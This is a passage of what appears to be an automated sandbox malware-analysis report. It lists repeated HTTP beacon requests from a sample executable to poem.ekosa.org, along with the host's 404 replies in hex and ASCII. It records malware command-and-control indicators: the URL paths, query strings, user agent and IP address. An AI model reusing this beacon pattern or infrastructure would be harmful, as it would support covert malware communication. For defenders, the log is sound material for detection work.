      Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>


      Session IDSource IPSource PortDestination IPDestination PortProcess
      262192.168.2.450042210.116.91.8080C:\Users\user\Desktop\WVbU1Gf5p8.exe
      TimestampkBytes transferredDirectionData
      Jan 11, 2021 17:57:28.999576092 CET5314OUTGET /intro/info/info.asp?search=2tjbpK6urq6urq6u HTTP/1.1
      Accept: */*
      Accept-Encoding: gzip, deflate
      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
      Host: poem.ekosa.org
      Connection: Keep-Alive
      Jan 11, 2021 17:57:29.262648106 CET5315INHTTP/1.1 404 Not Found
      Content-Type: text/html; charset=us-ascii
      Server: Microsoft-HTTPAPI/2.0
      Date: Mon, 11 Jan 2021 16:57:29 GMT
      Connection: close
      Content-Length: 315
      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
      Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>


      Session IDSource IPSource PortDestination IPDestination PortProcess
      263192.168.2.450043210.116.91.8080C:\Users\user\Desktop\WVbU1Gf5p8.exe
      TimestampkBytes transferredDirectionData
      Jan 11, 2021 17:57:29.535096884 CET5315OUTGET /intro/info/info.asp?search=2tjbpK6urq6urq6u HTTP/1.1
      Accept: */*
      Accept-Encoding: gzip, deflate
      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
      Host: poem.ekosa.org
      Connection: Keep-Alive
      Jan 11, 2021 17:57:29.799536943 CET5316INHTTP/1.1 404 Not Found
      Content-Type: text/html; charset=us-ascii
      Server: Microsoft-HTTPAPI/2.0
      Date: Mon, 11 Jan 2021 16:57:29 GMT
      Connection: close
      Content-Length: 315
      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
      Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>


      Session IDSource IPSource PortDestination IPDestination PortProcess
      264192.168.2.450044210.116.91.8080C:\Users\user\Desktop\WVbU1Gf5p8.exe
      TimestampkBytes transferredDirectionData
      Jan 11, 2021 17:57:30.203625917 CET5317OUTGET /intro/info/info.asp?id=dn678 HTTP/1.1
      Accept: */*
      Accept-Encoding: gzip, deflate
      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
      Host: poem.ekosa.org
      Connection: Keep-Alive
      Jan 11, 2021 17:57:30.465909004 CET5317INHTTP/1.1 404 Not Found
      Content-Type: text/html; charset=us-ascii
      Server: Microsoft-HTTPAPI/2.0
      Date: Mon, 11 Jan 2021 16:57:30 GMT
      Connection: close
      Content-Length: 315
      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
      Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>


      Session IDSource IPSource PortDestination IPDestination PortProcess
      265192.168.2.450045210.116.91.8080C:\Users\user\Desktop\WVbU1Gf5p8.exe
      TimestampkBytes transferredDirectionData
      Jan 11, 2021 17:57:30.735768080 CET5318OUTGET /intro/info/info.asp?search=2tjbpK6urq6urq6u HTTP/1.1
      Accept: */*
      Accept-Encoding: gzip, deflate
      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
      Host: poem.ekosa.org
      Connection: Keep-Alive
      Jan 11, 2021 17:57:30.998259068 CET5318INHTTP/1.1 404 Not Found
      Content-Type: text/html; charset=us-ascii
      Server: Microsoft-HTTPAPI/2.0
      Date: Mon, 11 Jan 2021 16:57:30 GMT
      Connection: close
      Content-Length: 315
      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
      Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>


      Session IDSource IPSource PortDestination IPDestination PortProcess
      266192.168.2.450046210.116.91.8080C:\Users\user\Desktop\WVbU1Gf5p8.exe
      TimestampkBytes transferredDirectionData
      Jan 11, 2021 17:57:31.264834881 CET5319OUTGET /intro/info/info.asp?search=2tjbpK6urq6urq6u HTTP/1.1
      Accept: */*
      Accept-Encoding: gzip, deflate
      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
      Host: poem.ekosa.org
      Connection: Keep-Alive
      Jan 11, 2021 17:57:31.526848078 CET5320INHTTP/1.1 404 Not Found
      Content-Type: text/html; charset=us-ascii
      Server: Microsoft-HTTPAPI/2.0
      Date: Mon, 11 Jan 2021 16:57:31 GMT
      Connection: close
      Content-Length: 315
      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
      Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>


      Session IDSource IPSource PortDestination IPDestination PortProcess
      267192.168.2.450047210.116.91.8080C:\Users\user\Desktop\WVbU1Gf5p8.exe
      TimestampkBytes transferredDirectionData
      Jan 11, 2021 17:57:31.912024021 CET5320OUTGET /intro/info/info.asp?id=dn678 HTTP/1.1
      Accept: */*
      Accept-Encoding: gzip, deflate
      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
      Host: poem.ekosa.org
      Connection: Keep-Alive
      Jan 11, 2021 17:57:32.174684048 CET5321INHTTP/1.1 404 Not Found
      Content-Type: text/html; charset=us-ascii
      Server: Microsoft-HTTPAPI/2.0
      Date: Mon, 11 Jan 2021 16:57:31 GMT
      Connection: close
      Content-Length: 315
      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
      Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>


      Session IDSource IPSource PortDestination IPDestination PortProcess
      268192.168.2.450048210.116.91.8080C:\Users\user\Desktop\WVbU1Gf5p8.exe
      TimestampkBytes transferredDirectionData
      Jan 11, 2021 17:57:32.447808027 CET5322OUTGET /intro/info/info.asp?search=2tjbpK6urq6urq6u HTTP/1.1
      Accept: */*
      Accept-Encoding: gzip, deflate
      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
      Host: poem.ekosa.org
      Connection: Keep-Alive
      Jan 11, 2021 17:57:32.707947969 CET5322INHTTP/1.1 404 Not Found
      Content-Type: text/html; charset=us-ascii
      Server: Microsoft-HTTPAPI/2.0
      Date: Mon, 11 Jan 2021 16:57:32 GMT
      Connection: close
      Content-Length: 315
      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
      Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>


      Session IDSource IPSource PortDestination IPDestination PortProcess
      269192.168.2.450049210.116.91.8080C:\Users\user\Desktop\WVbU1Gf5p8.exe
      TimestampkBytes transferredDirectionData
      Jan 11, 2021 17:57:32.992369890 CET5323OUTGET /intro/info/info.asp?search=2tjbpK6urq6urq6u HTTP/1.1
      Accept: */*
      Accept-Encoding: gzip, deflate
      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
      Host: poem.ekosa.org
      Connection: Keep-Alive
      Jan 11, 2021 17:57:33.263003111 CET5323INHTTP/1.1 404 Not Found
      Content-Type: text/html; charset=us-ascii
      Server: Microsoft-HTTPAPI/2.0
      Date: Mon, 11 Jan 2021 16:57:32 GMT
      Connection: close
      Content-Length: 315
      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
      Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>


      Session IDSource IPSource PortDestination IPDestination PortProcess
      27192.168.2.449791210.116.91.8080C:\Users\user\Desktop\WVbU1Gf5p8.exe
      TimestampkBytes transferredDirectionData
      Jan 11, 2021 17:55:13.009207964 CET398OUTGET /intro/info/info.asp?id=dn678 HTTP/1.1
      Accept: */*
      Accept-Encoding: gzip, deflate
      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
      Host: poem.ekosa.org
      Connection: Keep-Alive
      Jan 11, 2021 17:55:13.444442034 CET398INHTTP/1.1 404 Not Found
      Content-Type: text/html; charset=us-ascii
      Server: Microsoft-HTTPAPI/2.0
      Date: Mon, 11 Jan 2021 16:55:12 GMT
      Connection: close
      Content-Length: 315
      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
      Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>


      Session IDSource IPSource PortDestination IPDestination PortProcess
      270192.168.2.450050210.116.91.8080C:\Users\user\Desktop\WVbU1Gf5p8.exe
      TimestampkBytes transferredDirectionData
      Jan 11, 2021 17:57:33.658216000 CET5324OUTGET /intro/info/info.asp?id=dn678 HTTP/1.1
      Accept: */*
      Accept-Encoding: gzip, deflate
      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
      Host: poem.ekosa.org
      Connection: Keep-Alive
      Jan 11, 2021 17:57:33.928900003 CET5325INHTTP/1.1 404 Not Found
      Content-Type: text/html; charset=us-ascii
      Server: Microsoft-HTTPAPI/2.0
      Date: Mon, 11 Jan 2021 16:57:33 GMT
      Connection: close
      Content-Length: 315
      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
      Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>


      Session IDSource IPSource PortDestination IPDestination PortProcess
      271192.168.2.450051210.116.91.8080C:\Users\user\Desktop\WVbU1Gf5p8.exe
      TimestampkBytes transferredDirectionData
      Jan 11, 2021 17:57:34.205075979 CET5325OUTGET /intro/info/info.asp?search=2tjbpK6urq6urq6u HTTP/1.1
      Accept: */*
      Accept-Encoding: gzip, deflate
      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
      Host: poem.ekosa.org
      Connection: Keep-Alive
      Jan 11, 2021 17:57:34.469141006 CET5326INHTTP/1.1 404 Not Found
      Content-Type: text/html; charset=us-ascii
      Server: Microsoft-HTTPAPI/2.0
      Date: Mon, 11 Jan 2021 16:57:33 GMT
      Connection: close
      Content-Length: 315
